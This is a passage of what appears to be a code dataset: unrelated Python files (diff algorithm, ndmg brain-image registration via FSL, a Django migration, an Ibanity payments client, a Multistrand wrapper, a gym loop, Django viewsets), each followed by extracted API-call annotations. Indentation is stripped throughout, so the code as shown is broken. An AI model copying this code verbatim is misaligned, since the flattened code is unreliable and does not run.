:return: A Patch corresponding to the path.
"""
patch = Patch()
if path.is_snake():
path = path.prev
while path is not None and path.prev is not None and path.prev.j >= 0:
if path.is_snake():
raise ValueError("Found snake when looking for diff")
i = path.i
j = path.j
path = path.prev
ianchor = path.i
janchor = path.j
original_chunk = Chunk(ianchor, original[ianchor:i])
revised_chunk = Chunk(janchor, revised[janchor:j])
delta = Delta.create(original_chunk, revised_chunk)
patch.add_delta(delta)
if path.is_snake():
path = path.prev
return patch
class DiffNode:
"""
A diffnode in a diffpath.
A DiffNode and its previous node mark a delta between two input sequences,
in other words, two differing sub-sequences (possibly 0 length) between two matching sequences.
DiffNodes and Snakes allow for compression of diffpaths,
because each snake is represented by a single Snake node
and each contiguous series of insertions and deletions is represented by a DiffNode.
:type i: int
:type j: int
:type lastSnake: Optional["DiffNode"]
:type prev: Optional["DiffNode"]
:type snake: bool
"""
__slots__ = "i", "j", "lastSnake", "snake", "prev"
def __init__(self, i, j):
"""
Creates a new path node
:param i: The position in the original sequence for the new node.
:param j: The position in the revised sequence for the new node.
:param prev: The previous node in the path.
"""
self.i = i
self.j = j
self.lastSnake = None
self.snake = False
def is_snake(self):
"""
Return if the node is a snake
:return: true if the node is a snake
"""
return self.snake
def previous_snake(self):
"""
Skips sequences of nodes until a snake or bootstrap node is found.
If this node is a bootstrap node (no previous), this method will return None.
:return: the first snake or bootstrap node found in the path, or None
"""
return self.lastSnake
def create_diff_node(i, j, prev):
node = DiffNode(i, j)
prev = prev.lastSnake
node.prev = prev
if i < 0 or j < 0:
node.lastSnake = None
else:
node.lastSnake = prev.lastSnake
return node
def create_snake(i, j, prev):
snake = DiffNode(i, j)
snake.prev = prev
snake.lastSnake = snake
snake.snake = True
return snake
| [
"hashlib.sha256"
] | [((2027, 2043), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (2041, 2043), False, 'import hashlib\n'), ((2409, 2425), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (2423, 2425), False, 'import hashlib\n')] |
#!/usr/bin/env python
# Copyright 2016 NeuroData (http://neurodata.io)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# register.py
# Created by <NAME> on 2016-01-28.
# Email: <EMAIL>
from subprocess import Popen, PIPE
import os.path as op
import ndmg.utils as mgu
import nibabel as nb
import numpy as np
import nilearn.image as nl
class register(object):
def __init__(self):
"""
Enables registration of single images to one another as well as volumes
within multi-volume image stacks. Has options to compute transforms,
apply transforms, as well as a built-in method for aligning low
resolution dwi images to a high resolution atlas.
"""
pass
def align(self, inp, ref, xfm=None, out=None, dof=12, searchrad=True,
bins=256, interp=None, cost="mutualinfo"):
"""
Aligns two images and stores the transform between them
**Positional Arguments:**
inp:
                - Input image to be aligned as a nifti image file
ref:
- Image being aligned to as a nifti image file
xfm:
- Returned transform between two images
out:
- determines whether the image will be automatically
aligned.
dof:
- the number of degrees of freedom of the alignment.
searchrad:
- a bool indicating whether to use the predefined
searchradius parameter (180 degree sweep in x, y, and z).
interp:
- the interpolation method to use. Default is trilinear.
"""
cmd = "flirt -in {} -ref {}".format(inp, ref)
if xfm is not None:
cmd += " -omat {}".format(xfm)
if out is not None:
cmd += " -out {}".format(out)
if dof is not None:
cmd += " -dof {}".format(dof)
if bins is not None:
cmd += " -bins {}".format(bins)
if interp is not None:
cmd += " -interp {}".format(interp)
if cost is not None:
cmd += " -cost {}".format(cost)
if searchrad is not None:
cmd += " -searchrx -180 180 -searchry -180 180 " +\
"-searchrz -180 180"
mgu.execute_cmd(cmd, verb=True)
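    # Illustrative call (file names are placeholders): align("in.nii.gz", "ref.nii.gz", xfm="out.mat")
    # builds roughly: flirt -in in.nii.gz -ref ref.nii.gz -omat out.mat -dof 12 -bins 256
    # -cost mutualinfo -searchrx -180 180 -searchry -180 180 -searchrz -180 180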
def align_epi(self, epi, t1, brain, out):
"""
        Aligns EPI images to the T1w image
"""
cmd = 'epi_reg --epi={} --t1={} --t1brain={} --out={}'
cmd = cmd.format(epi, t1, brain, out)
mgu.execute_cmd(cmd, verb=True)
def align_nonlinear(self, inp, ref, xfm, warp, mask=None):
"""
Aligns two images using nonlinear methods and stores the
transform between them.
**Positional Arguments:**
inp:
- the input image.
ref:
- the reference image.
            xfm:
- the affine transform to use.
warp:
- the path to store the nonlinear warp.
mask:
- a mask in which voxels will be extracted
during nonlinear alignment.
"""
cmd = "fnirt --in={} --aff={} --cout={} --ref={} --subsamp=4,2,1,1"
cmd = cmd.format(inp, xfm, warp, ref)
if mask is not None:
cmd += " --refmask={}".format(mask)
out, err = mgu.execute_cmd(cmd, verb=True)
def applyxfm(self, inp, ref, xfm, aligned):
"""
Aligns two images with a given transform
**Positional Arguments:**
inp:
- Input impage to be aligned as a nifti image file
ref:
- Image being aligned to as a nifti image file
xfm:
- Transform between two images
aligned:
- Aligned output image as a nifti image file
"""
cmd = "flirt -in {} -ref {} -out {} -init {} -interp trilinear -applyxfm"
cmd = cmd.format(inp, ref, aligned, xfm)
mgu.execute_cmd(cmd, verb=True)
def apply_warp(self, inp, out, ref, warp, xfm=None, mask=None):
"""
Applies a warp from the functional to reference space
in a single step, using information about the structural->ref
mapping as well as the functional to structural mapping.
**Positional Arguments:**
inp:
- the input image to be aligned as a nifti image file.
out:
- the output aligned image.
ref:
- the image being aligned to.
warp:
- the warp from the structural to reference space.
            xfm:
- the affine transformation from functional to
structural space.
"""
cmd = "applywarp --ref=" + ref + " --in=" + inp + " --out=" + out +\
" --warp=" + warp
if xfm is not None:
cmd += " --premat=" + xfm
if mask is not None:
cmd += " --mask=" + mask
mgu.execute_cmd(cmd, verb=True)
def align_slices(self, dwi, corrected_dwi, idx):
"""
Performs eddy-correction (or self-alignment) of a stack of 3D images
**Positional Arguments:**
dwi:
- 4D (DTI) image volume as a nifti file
corrected_dwi:
- Corrected and aligned DTI volume in a nifti file
idx:
- Index of the first B0 volume in the stack
"""
cmd = "eddy_correct {} {} {}".format(dwi, corrected_dwi, idx)
status = mgu.execute_cmd(cmd, verb=True)
def resample(self, base, ingested, template):
"""
Resamples the image such that images which have already been aligned
in real coordinates also overlap in the image/voxel space.
**Positional Arguments**
base:
- Image to be aligned
ingested:
- Name of image after alignment
template:
- Image that is the target of the alignment
"""
# Loads images
template_im = nb.load(template)
base_im = nb.load(base)
# Aligns images
target_im = nl.resample_img(base_im,
target_affine=template_im.get_affine(),
target_shape=template_im.get_data().shape,
interpolation="nearest")
# Saves new image
nb.save(target_im, ingested)
def resample_fsl(self, base, res, template):
"""
A function to resample a base image in fsl to that of a template.
**Positional Arguments:**
base:
- the path to the base image to resample.
res:
- the filename after resampling.
template:
- the template image to align to.
"""
goal_res = int(nb.load(template).get_header().get_zooms()[0])
cmd = "flirt -in {} -ref {} -out {} -nosearch -applyisoxfm {}"
cmd = cmd.format(base, template, res, goal_res)
mgu.execute_cmd(cmd, verb=True)
def combine_xfms(self, xfm1, xfm2, xfmout):
"""
A function to combine two transformations, and output the
resulting transformation.
**Positional Arguments**
xfm1:
- the path to the first transformation
xfm2:
- the path to the second transformation
xfmout:
- the path to the output transformation
"""
cmd = "convert_xfm -omat {} -concat {} {}".format(xfmout, xfm1, xfm2)
mgu.execute_cmd(cmd, verb=True)
def func2atlas(self, func, t1w, atlas, atlas_brain, atlas_mask,
aligned_func, aligned_t1w, outdir):
"""
A function to change coordinates from the subject's
brain space to that of a template using nonlinear
registration.
**Positional Arguments:**
            func:
- the path of the preprocessed fmri image.
t1w:
- the path of the T1 scan.
atlas:
- the template atlas.
atlas_brain:
- the template brain.
atlas_mask:
- the template mask.
aligned_func:
- the name of the aligned fmri scan to produce.
aligned_t1w:
- the name of the aligned anatomical scan to produce
outdir:
- the output base directory.
"""
func_name = mgu.get_filename(func)
t1w_name = mgu.get_filename(t1w)
atlas_name = mgu.get_filename(atlas)
func2 = mgu.name_tmps(outdir, func_name, "_t1w.nii.gz")
temp_aligned = mgu.name_tmps(outdir, func_name, "_noresamp.nii.gz")
t1w_brain = mgu.name_tmps(outdir, t1w_name, "_brain.nii.gz")
xfm_t1w2temp = mgu.name_tmps(outdir, func_name, "_xfm_t1w2temp.mat")
# Applies skull stripping to T1 volume, then EPI alignment to T1
mgu.extract_brain(t1w, t1w_brain, ' -B')
self.align_epi(func, t1w, t1w_brain, func2)
self.align(t1w_brain, atlas_brain, xfm_t1w2temp)
# Only do FNIRT at 1mm or 2mm
if nb.load(atlas).get_data().shape in [(182, 218, 182), (91, 109, 91)]:
warp_t1w2temp = mgu.name_tmps(outdir, func_name,
"_warp_t1w2temp.nii.gz")
self.align_nonlinear(t1w, atlas, xfm_t1w2temp, warp_t1w2temp,
mask=atlas_mask)
self.apply_warp(func2, temp_aligned, atlas, warp_t1w2temp)
self.apply_warp(t1w, aligned_t1w, atlas, warp_t1w2temp,
mask=atlas_mask)
else:
self.applyxfm(func2, atlas, xfm_t1w2temp, temp_aligned)
self.applyxfm(t1w, atlas, xfm_t1w2temp, aligned_t1w)
self.resample(temp_aligned, aligned_func, atlas)
def dwi2atlas(self, dwi, gtab, t1w, atlas,
aligned_dwi, outdir, clean=False):
"""
        Aligns a dwi image to an atlas by first registering it to an intermediate T1w image
**Positional Arguments:**
dwi:
                - Input image to be aligned as a nifti image file
gtab:
- object containing gradient directions and strength
t1w:
- Intermediate image being aligned to as a nifti image file
atlas:
- Terminal image being aligned to as a nifti image file
aligned_dwi:
- Aligned output dwi image as a nifti image file
outdir:
- Directory for derivatives to be stored
"""
# Creates names for all intermediate files used
dwi_name = mgu.get_filename(dwi)
t1w_name = mgu.get_filename(t1w)
atlas_name = mgu.get_filename(atlas)
dwi2 = mgu.name_tmps(outdir, dwi_name, "_t2.nii.gz")
temp_aligned = mgu.name_tmps(outdir, dwi_name, "_ta.nii.gz")
temp_aligned2 = mgu.name_tmps(outdir, dwi_name, "_ta2.nii.gz")
b0 = mgu.name_tmps(outdir, dwi_name, "_b0.nii.gz")
t1w_brain = mgu.name_tmps(outdir, t1w_name, "_ss.nii.gz")
xfm = mgu.name_tmps(outdir, t1w_name,
"_" + atlas_name + "_xfm.mat")
# Align DTI volumes to each other
self.align_slices(dwi, dwi2, np.where(gtab.b0s_mask)[0][0])
# Loads DTI image in as data and extracts B0 volume
dwi_im = nb.load(dwi2)
b0_im = mgu.get_b0(gtab, dwi_im.get_data())
# Wraps B0 volume in new nifti image
b0_head = dwi_im.get_header()
b0_head.set_data_shape(b0_head.get_data_shape()[0:3])
b0_out = nb.Nifti1Image(b0_im, affine=dwi_im.get_affine(),
header=b0_head)
b0_out.update_header()
nb.save(b0_out, b0)
# Applies skull stripping to T1 volume, then EPI alignment to T1
mgu.extract_brain(t1w, t1w_brain, ' -B')
self.align_epi(dwi2, t1w, t1w_brain, temp_aligned)
# Applies linear registration from T1 to template
self.align(t1w, atlas, xfm)
# Applies combined transform to dwi image volume
self.applyxfm(temp_aligned, atlas, xfm, temp_aligned2)
self.resample(temp_aligned2, aligned_dwi, atlas)
if clean:
cmd = "rm -f {} {} {} {} {}*".format(dwi2, temp_aligned, b0,
xfm, t1w_name)
print("Cleaning temporary registration files...")
mgu.execute_cmd(cmd)
| [
"ndmg.utils.get_filename",
"nibabel.save",
"ndmg.utils.extract_brain",
"nibabel.load",
"numpy.where",
"ndmg.utils.name_tmps",
"ndmg.utils.execute_cmd"
] | [((2857, 2888), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (2872, 2888), True, 'import ndmg.utils as mgu\n'), ((3116, 3147), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (3131, 3147), True, 'import ndmg.utils as mgu\n'), ((3957, 3988), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (3972, 3988), True, 'import ndmg.utils as mgu\n'), ((4628, 4659), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (4643, 4659), True, 'import ndmg.utils as mgu\n'), ((5649, 5680), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (5664, 5680), True, 'import ndmg.utils as mgu\n'), ((6226, 6257), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (6241, 6257), True, 'import ndmg.utils as mgu\n'), ((6788, 6805), 'nibabel.load', 'nb.load', (['template'], {}), '(template)\n', (6795, 6805), True, 'import nibabel as nb\n'), ((6824, 6837), 'nibabel.load', 'nb.load', (['base'], {}), '(base)\n', (6831, 6837), True, 'import nibabel as nb\n'), ((7157, 7185), 'nibabel.save', 'nb.save', (['target_im', 'ingested'], {}), '(target_im, ingested)\n', (7164, 7185), True, 'import nibabel as nb\n'), ((7787, 7818), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (7802, 7818), True, 'import ndmg.utils as mgu\n'), ((8335, 8366), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {'verb': '(True)'}), '(cmd, verb=True)\n', (8350, 8366), True, 'import ndmg.utils as mgu\n'), ((9276, 9298), 'ndmg.utils.get_filename', 'mgu.get_filename', (['func'], {}), '(func)\n', (9292, 9298), True, 'import ndmg.utils as mgu\n'), ((9318, 9339), 'ndmg.utils.get_filename', 'mgu.get_filename', (['t1w'], {}), '(t1w)\n', (9334, 9339), True, 'import ndmg.utils as mgu\n'), ((9361, 9384), 'ndmg.utils.get_filename', 'mgu.get_filename', (['atlas'], {}), '(atlas)\n', (9377, 9384), True, 'import ndmg.utils as mgu\n'), ((9402, 9449), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_t1w.nii.gz"""'], {}), "(outdir, func_name, '_t1w.nii.gz')\n", (9415, 9449), True, 'import ndmg.utils as mgu\n'), ((9473, 9525), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_noresamp.nii.gz"""'], {}), "(outdir, func_name, '_noresamp.nii.gz')\n", (9486, 9525), True, 'import ndmg.utils as mgu\n'), ((9546, 9594), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', '"""_brain.nii.gz"""'], {}), "(outdir, t1w_name, '_brain.nii.gz')\n", (9559, 9594), True, 'import ndmg.utils as mgu\n'), ((9618, 9671), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_xfm_t1w2temp.mat"""'], {}), "(outdir, func_name, '_xfm_t1w2temp.mat')\n", (9631, 9671), True, 'import ndmg.utils as mgu\n'), ((9754, 9794), 'ndmg.utils.extract_brain', 'mgu.extract_brain', (['t1w', 't1w_brain', '""" -B"""'], {}), "(t1w, t1w_brain, ' -B')\n", (9771, 9794), True, 'import ndmg.utils as mgu\n'), ((11546, 11567), 'ndmg.utils.get_filename', 'mgu.get_filename', (['dwi'], {}), '(dwi)\n', (11562, 11567), True, 'import ndmg.utils as mgu\n'), ((11587, 11608), 'ndmg.utils.get_filename', 'mgu.get_filename', (['t1w'], {}), '(t1w)\n', (11603, 11608), True, 'import ndmg.utils as mgu\n'), ((11630, 11653), 'ndmg.utils.get_filename', 'mgu.get_filename', (['atlas'], {}), '(atlas)\n', (11646, 11653), True, 'import 
ndmg.utils as mgu\n'), ((11670, 11715), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_t2.nii.gz"""'], {}), "(outdir, dwi_name, '_t2.nii.gz')\n", (11683, 11715), True, 'import ndmg.utils as mgu\n'), ((11739, 11784), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_ta.nii.gz"""'], {}), "(outdir, dwi_name, '_ta.nii.gz')\n", (11752, 11784), True, 'import ndmg.utils as mgu\n'), ((11809, 11855), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_ta2.nii.gz"""'], {}), "(outdir, dwi_name, '_ta2.nii.gz')\n", (11822, 11855), True, 'import ndmg.utils as mgu\n'), ((11869, 11914), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'dwi_name', '"""_b0.nii.gz"""'], {}), "(outdir, dwi_name, '_b0.nii.gz')\n", (11882, 11914), True, 'import ndmg.utils as mgu\n'), ((11935, 11980), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', '"""_ss.nii.gz"""'], {}), "(outdir, t1w_name, '_ss.nii.gz')\n", (11948, 11980), True, 'import ndmg.utils as mgu\n'), ((11995, 12057), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 't1w_name', "('_' + atlas_name + '_xfm.mat')"], {}), "(outdir, t1w_name, '_' + atlas_name + '_xfm.mat')\n", (12008, 12057), True, 'import ndmg.utils as mgu\n'), ((12275, 12288), 'nibabel.load', 'nb.load', (['dwi2'], {}), '(dwi2)\n', (12282, 12288), True, 'import nibabel as nb\n'), ((12641, 12660), 'nibabel.save', 'nb.save', (['b0_out', 'b0'], {}), '(b0_out, b0)\n', (12648, 12660), True, 'import nibabel as nb\n'), ((12743, 12783), 'ndmg.utils.extract_brain', 'mgu.extract_brain', (['t1w', 't1w_brain', '""" -B"""'], {}), "(t1w, t1w_brain, ' -B')\n", (12760, 12783), True, 'import ndmg.utils as mgu\n'), ((10059, 10116), 'ndmg.utils.name_tmps', 'mgu.name_tmps', (['outdir', 'func_name', '"""_warp_t1w2temp.nii.gz"""'], {}), "(outdir, func_name, '_warp_t1w2temp.nii.gz')\n", (10072, 10116), True, 'import ndmg.utils as mgu\n'), ((13346, 13366), 'ndmg.utils.execute_cmd', 'mgu.execute_cmd', (['cmd'], {}), '(cmd)\n', (13361, 13366), True, 'import ndmg.utils as mgu\n'), ((12166, 12189), 'numpy.where', 'np.where', (['gtab.b0s_mask'], {}), '(gtab.b0s_mask)\n', (12174, 12189), True, 'import numpy as np\n'), ((9962, 9976), 'nibabel.load', 'nb.load', (['atlas'], {}), '(atlas)\n', (9969, 9976), True, 'import nibabel as nb\n'), ((7605, 7622), 'nibabel.load', 'nb.load', (['template'], {}), '(template)\n', (7612, 7622), True, 'import nibabel as nb\n')] |
# Generated by Django 2.1.1 on 2018-09-22 21:45
import core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('miner', '0004_request_data'),
]
operations = [
migrations.AlterModelOptions(
name='miner',
options={'ordering': ['name', 'version'], 'verbose_name': 'Майнер'},
),
migrations.AlterModelOptions(
name='request',
options={'ordering': ['miner', 'name'], 'verbose_name': 'Запрос'},
),
migrations.AlterModelOptions(
name='server',
options={'ordering': ['name'], 'verbose_name': 'Сервер'},
),
migrations.AlterField(
model_name='miner',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=63, unique=True, validators=[core.validators.validate_slug]),
),
migrations.AlterField(
model_name='request',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=31, validators=[core.validators.validate_slug]),
),
migrations.AlterField(
model_name='server',
name='slug',
field=models.SlugField(editable=False, help_text='A label for URL config.', max_length=31, unique=True, validators=[core.validators.validate_slug]),
),
]
| [
"django.db.migrations.AlterModelOptions",
"django.db.models.SlugField"
] | [((250, 365), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""miner"""', 'options': "{'ordering': ['name', 'version'], 'verbose_name': 'Майнер'}"}), "(name='miner', options={'ordering': ['name',\n 'version'], 'verbose_name': 'Майнер'})\n", (278, 365), False, 'from django.db import migrations, models\n'), ((406, 521), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""request"""', 'options': "{'ordering': ['miner', 'name'], 'verbose_name': 'Запрос'}"}), "(name='request', options={'ordering': ['miner',\n 'name'], 'verbose_name': 'Запрос'})\n", (434, 521), False, 'from django.db import migrations, models\n'), ((562, 667), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""server"""', 'options': "{'ordering': ['name'], 'verbose_name': 'Сервер'}"}), "(name='server', options={'ordering': ['name'],\n 'verbose_name': 'Сервер'})\n", (590, 667), False, 'from django.db import migrations, models\n'), ((806, 951), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(63)', 'unique': '(True)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=63, unique=True, validators=[core.validators.validate_slug])\n", (822, 951), False, 'from django.db import migrations, models\n'), ((1068, 1200), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(31)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=31, validators=[core.validators.validate_slug])\n", (1084, 1200), False, 'from django.db import migrations, models\n'), ((1316, 1461), 'django.db.models.SlugField', 'models.SlugField', ([], {'editable': '(False)', 'help_text': '"""A label for URL config."""', 'max_length': '(31)', 'unique': '(True)', 'validators': '[core.validators.validate_slug]'}), "(editable=False, help_text='A label for URL config.',\n max_length=31, unique=True, validators=[core.validators.validate_slug])\n", (1332, 1461), False, 'from django.db import migrations, models\n')] |
from collections import namedtuple
from ibanity import Ibanity
from ibanity.Flatten import flatten_json
def create(financial_institution_id, attributes, customer_access_token):
uri = Ibanity.client.api_schema["customer"]["financialInstitution"]["paymentInitiationRequests"] \
.replace("{financialInstitutionId}", financial_institution_id) \
.replace("{paymentInitiationRequestId}", "")
body = {
"data": {
"type": "paymentInitiationRequest",
"attributes": attributes
}
}
response = Ibanity.client.post(uri, body, {}, "Bearer " + str(customer_access_token))
return flatten_json(response["data"])
def find(financial_institution_id, id, customer_access_token):
uri = Ibanity.client.api_schema["customer"]["financialInstitution"]["paymentInitiationRequests"] \
.replace("{financialInstitutionId}", financial_institution_id) \
.replace("{paymentInitiationRequestId}", id)
response = Ibanity.client.get(uri, {}, "Bearer " + str(customer_access_token))
return flatten_json(response["data"])
| [
"ibanity.Flatten.flatten_json"
] | [((683, 713), 'ibanity.Flatten.flatten_json', 'flatten_json', (["response['data']"], {}), "(response['data'])\n", (695, 713), False, 'from ibanity.Flatten import flatten_json\n'), ((1102, 1132), 'ibanity.Flatten.flatten_json', 'flatten_json', (["response['data']"], {}), "(response['data'])\n", (1114, 1132), False, 'from ibanity.Flatten import flatten_json\n')] |
"""Multistrand wrapper"""
import os
import subprocess
import re
OUTFILE = "Logfile"
def DNAkinfold(base_infile, params):
"""
Expand (or replace) parameters in base_infile with those supplied from
the command line.
"""
in_name = base_infile + ".in"
fbase = open(base_infile, "r")
fin = open(in_name, "w")
# Copy all the file content that's not single line parameters
# and save all single line parameters to the parameter list (or ignore).
for line in fbase:
p = re.match(r"#([^=]*)=(.*)\n", line)
if p: # If it's a single line parameter
name, value = p.group(1, 2)
if name not in params: # We ignore overridden parameters.
params[name] = value
else:
fin.write(line)
fbase.close()
if OUTFILE not in params:
params[OUTFILE] = base_infile + ".out"
out_name = params[OUTFILE]
# Write out all parameters.
for name, value in list(params.items()):
fin.write("#%s=%s\n" % (name, value))
fin.close()
if os.path.isfile(out_name):
os.remove(out_name)
# Run Multistrand!
command = "Multistrand < %s" % in_name
if params["OutputInterval"] == -1: # If we say quiet, we mean it.
command += " > /dev/null"
print(command)
subprocess.check_call(command, shell=True)
if __name__ == "__main__":
import sys
try:
infile = sys.argv[1]
params = dict([arg.split("=", 1) for arg in sys.argv[2:]])
except:
print("usage: python multihelp.py infile [ARG=VAL ...]")
sys.exit(1)
DNAkinfold(infile, params)
| [
"subprocess.check_call",
"re.match",
"os.path.isfile",
"sys.exit",
"os.remove"
] | [((1004, 1028), 'os.path.isfile', 'os.path.isfile', (['out_name'], {}), '(out_name)\n', (1018, 1028), False, 'import os\n'), ((1238, 1280), 'subprocess.check_call', 'subprocess.check_call', (['command'], {'shell': '(True)'}), '(command, shell=True)\n', (1259, 1280), False, 'import subprocess\n'), ((500, 534), 're.match', 're.match', (['"""#([^=]*)=(.*)\\\\n"""', 'line'], {}), "('#([^=]*)=(.*)\\\\n', line)\n", (508, 534), False, 'import re\n'), ((1034, 1053), 'os.remove', 'os.remove', (['out_name'], {}), '(out_name)\n', (1043, 1053), False, 'import os\n'), ((1495, 1506), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1503, 1506), False, 'import sys\n')] |
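A minimal usage sketch for the DNAkinfold wrapper above. The template file name and its contents are placeholders, the module name is taken from the usage string in the code, and the Multistrand binary must be on the PATH:

# Equivalent to: python multihelp.py hairpin.base OutputInterval=-1 Logfile=hairpin.out
from multihelp import DNAkinfold

DNAkinfold("hairpin.base", {"OutputInterval": "-1", "Logfile": "hairpin.out"})
# writes hairpin.base.in with all "#name=value" parameters merged, then runs Multistrand on it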
import gym
env = gym.make('CartPole-v1')
env.reset()
for _ in range(1000): # run for 1000 steps
env.render()
action = env.action_space.sample() # pick a random action
env.step(action) # take action | [
"gym.make"
] | [((17, 40), 'gym.make', 'gym.make', (['"""CartPole-v1"""'], {}), "('CartPole-v1')\n", (25, 40), False, 'import gym\n')] |
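A slightly fuller loop for the same environment, offered as a sketch; it assumes the classic pre-0.26 gym API used above, where reset() returns the observation and step() returns (obs, reward, done, info):

import gym

env = gym.make('CartPole-v1')
obs = env.reset()
done, total_reward = False, 0.0
while not done:
    # sample a random action and accumulate the episode reward
    obs, reward, done, info = env.step(env.action_space.sample())
    total_reward += reward
env.close()
print(total_reward)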
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.contrib.contenttypes.models import ContentType
from django_filters.rest_framework import FilterSet, CharFilter
from rest_framework import status
from rest_framework import viewsets
from rest_framework.mixins import (
ListModelMixin,
CreateModelMixin,
RetrieveModelMixin,
DestroyModelMixin,
)
from rest_framework.response import Response
from rest_framework_extensions.mixins import NestedViewSetMixin
from api.views import ViewInterfaceGenericViewSet
from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog
from . import serializers
class GroupConfigFilterSet(FilterSet):
object_type = CharFilter(
field_name='object_type', label='object_type', method='filter_object_type'
)
def filter_object_type(self, queryset, name, value):
value = serializers.revert_model_name(value)
object_type = ContentType.objects.get(app_label='cm', model=value)
return queryset.filter(**{name: object_type})
class Meta:
model = GroupConfig
fields = ('object_id', 'object_type')
class GroupConfigHostViewSet(
NestedViewSetMixin,
ListModelMixin,
CreateModelMixin,
RetrieveModelMixin,
DestroyModelMixin,
viewsets.GenericViewSet,
): # pylint: disable=too-many-ancestors
queryset = Host.objects.all()
serializer_class = serializers.GroupConfigHostSerializer
lookup_url_kwarg = 'host_id'
def destroy(self, request, *args, **kwargs):
group_config = GroupConfig.obj.get(id=self.kwargs.get('parent_lookup_group_config'))
host = self.get_object()
group_config.hosts.remove(host)
return Response(status=status.HTTP_204_NO_CONTENT)
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
return context
class GroupConfigHostCandidateViewSet(
NestedViewSetMixin, viewsets.ReadOnlyModelViewSet
): # pylint: disable=too-many-ancestors
serializer_class = serializers.GroupConfigHostCandidateSerializer
lookup_url_kwarg = 'host_id'
def get_queryset(self):
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is None:
return None
group_config = GroupConfig.obj.get(id=group_config_id)
return group_config.host_candidate()
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
return context
class GroupConfigConfigViewSet(NestedViewSetMixin, RetrieveModelMixin, viewsets.GenericViewSet):
queryset = ObjectConfig.objects.all()
serializer_class = serializers.GroupConfigConfigSerializer
def get_serializer_context(self):
context = super().get_serializer_context()
group_config_id = self.kwargs.get('parent_lookup_group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'group_config': group_config})
context.update({'obj_ref__group_config': group_config})
obj_ref_id = self.kwargs.get('pk')
if obj_ref_id is not None:
obj_ref = ObjectConfig.obj.get(id=obj_ref_id)
context.update({'obj_ref': obj_ref})
return context
class GroupConfigConfigLogViewSet(
NestedViewSetMixin,
RetrieveModelMixin,
ListModelMixin,
CreateModelMixin,
ViewInterfaceGenericViewSet,
): # pylint: disable=too-many-ancestors
serializer_class = serializers.GroupConfigConfigLogSerializer
ui_serializer_class = serializers.UIGroupConfigConfigLogSerializer
filterset_fields = ('id',)
ordering_fields = ('id',)
def get_queryset(self):
kwargs = {
'obj_ref__group_config': self.kwargs.get('parent_lookup_obj_ref__group_config'),
'obj_ref': self.kwargs.get('parent_lookup_obj_ref'),
}
return ConfigLog.objects.filter(**kwargs).order_by('-id')
def get_serializer_context(self):
context = super().get_serializer_context()
